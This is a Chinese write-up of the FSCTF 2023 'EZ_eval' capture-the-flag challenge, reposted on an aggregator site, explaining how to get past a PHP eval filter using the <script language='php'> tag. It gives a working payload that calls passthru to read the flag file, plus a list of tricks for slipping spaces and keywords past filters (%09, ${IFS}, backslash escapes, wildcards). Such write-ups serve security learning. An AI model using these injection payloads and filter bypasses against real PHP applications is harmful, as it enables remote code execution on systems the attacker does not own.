[FSCTF 2023]EZ_eval

这篇具有很好参考价值的文章主要介绍了[FSCTF 2023]EZ_eval。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

[FSCTF 2023]EZ_eval

[FSCTF 2023]EZ_eval

这道题关键就是过滤了?号和空格还有eval执行时用了php的结束标志表示php代码到此为止了,那不行啊我后面的参数还等着被执行呢……
可以用php短标签,有三种方式:

  1. <? echo '123';?> #前提是开启配置参数short_open_tags=on​​

  2. <script language="php">echo 'hello'; #不需要修改参数开关,但是只能在7.0以下可用。​​

  3. <% echo '123';%> #开启配置参数asp_tags=on,并且只能在7.0以下版本使用​​

    [FSCTF 2023]EZ_eval所以用第二种嘛

    构造payload:word=<script%09language="php">passthru("ta\c%09/f*");

    用%09绕过空格,其它的我都试了一遍,没绕过

    用\绕过tac的限制

    *通配符绕过flag的关键字

    最后:

    [FSCTF 2023]EZ_eval其它绕过空格的方式:

    %20: 在URL编码中,空格通常被表示为 %20​​。

    %09: 水平制表符(Horizontal Tab)的URL编码是 %09​​。

    使用其他字符: 有时你可以使用其他字符来代替空格,例如使用下划线 _​ 或连字符 -​ 来表示空格。

    \t

    ${IFS}

    $IFS$1​//1这个数字写什么都行好像

    <

    <>

    ,

    文章来源地址https://www.toymoban.com/news/detail-711356.html

到了这里,关于[FSCTF 2023]EZ_eval的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 让你的微信小程序对用户更加友好:上拉加载和下拉刷新就是关键

    上拉加载和下拉刷新是小程序开发的常见需求。本文将介绍如何在微信小程序中实现上拉加载和下拉刷新的功能,为用户带来更加流畅、便捷的使用体验。 实现效果如下: 1. 首先需要在使用到的 json 文件下配置 \\\"enablePullDownRefresh\\\": true 2. 在 js 文件中加上触底函数跟上拉函数

    2024年02月11日
    浏览(42)
  • php实现关键词过滤

    1. 构建库 首先,你需要构建一个包含敏感的库。你可以将这些敏感存储在一个数组中,或者将它们存储在数据库中。 2. 实现过滤函数 接下来,你需要实现一个函数,用于过滤文本中的敏感。这个函数将接收一个需要过滤的字符串作为输入,

    2024年02月06日
    浏览(49)
  • 树结构 根据关键字过滤

    案例: 默认 过滤之后    直接看代码: 注释: 1. 用到el-tree 中的方法  2.  this.$refs.tree。。。中的 \\\"tree\\\" 跟上面绑定的一致    3.    data.Text         这个Text 与defaultProps 中label字段 一致。  

    2024年02月13日
    浏览(43)
  • CTFHub XSS 过滤关键词 WriteUp

    前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 碰到这种情况不要慌,下面给出两种方法绕过过滤。 双写绕过 大小写绕过 上述两种方式提交后成功在xss平台收到数据: 提交flag,成功解出

    2024年02月13日
    浏览(44)
  • 软件测试|MySQL DISTINCT关键字过滤重复数据

    简介 在MySQL中,有时候我们需要从表中检索唯一的、不重复的数据。这时,我们可以使用 DISTINCT 来过滤掉重复的数据行。在本文中,我们将深入探讨MySQL中 DISTINCT 的用法以及如何在查询中使用它来得到不重复的结果集。 基本语法 DISTINCT 用于在 SELECT 语句中指示

    2024年02月02日
    浏览(44)
  • [SWPUCTF 2022 新生赛]ez_ez_php

    这段代码是一个简单的PHP文件处理脚本。让我们逐行进行分析: error_reporting(0);  - 这行代码设置了错误报告的级别为0,意味着不显示任何错误。 if (isset($_GET[\\\'file\\\'])) {  - 这行代码检查是否存在一个名为\\\"file\\\"的GET参数。 if ( substr($_GET[\\\"file\\\"], 0, 3) === \\\"php\\\" ) {  - 这行代码使用 su

    2024年02月12日
    浏览(39)
  • 【el-tree查询并高亮】vue使用el-tree组件,搜索展开并选中对应节点,高亮搜索的关键字,过滤后高亮关键字,两种方法

    效果图这样的,会把所有的有这些的节点都展开 代码: 这里的逻辑就是通过递归循环把所有和匹配的节点筛选出来 然后通过setCheckedKeys方法把他展开选中 然后通过filterReal把高亮标蓝 这个是用的官方文档的那个过滤方式,可以参考官方文档看一下。 只不

    2024年02月15日
    浏览(74)
  • 2023.9 - java - static 关键字

     tips:  java 的 static修饰的 方法和变量 可以被 实例访问 ,但是typeScript 不可以。 static主要和Java的内存管理有关。我们可以将static与变量,方法,代码块一起使用。static属于该类,而不是该类的实例。 static可以修饰: 变量(也称为类变量) 方法(

    2024年02月10日
    浏览(45)
  • FPGA面试笔记ea-ez

    FIFO Generator核有两种读模式:Standard FIFO(标准模式)、First Word Fall Through(FWFT模式) FWFT模式类似于QuartusⅡ软件中FIFO的超前输出模式,没有读延时。 注:如果选择标准模式,勾选Output Registers,会增加一个读延时;但是选择FWFT模式,勾选Output Registers,仍然没有读延时; 风扇

    2024年02月21日
    浏览(41)
  • ez_pz_hackover_2016

    32位,保护全关 这里不存在漏洞点 漏洞点在这里,通过上面输入的数据传进这里并执行栈 思路 我们需要计算不同函数栈的距离 需要绕过strcmp和memchr, x00 均可绕过,答案就呼之欲出了, 调好偏移,使返回地址指向shellcode就可以getshell了 参考

    2024年02月08日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包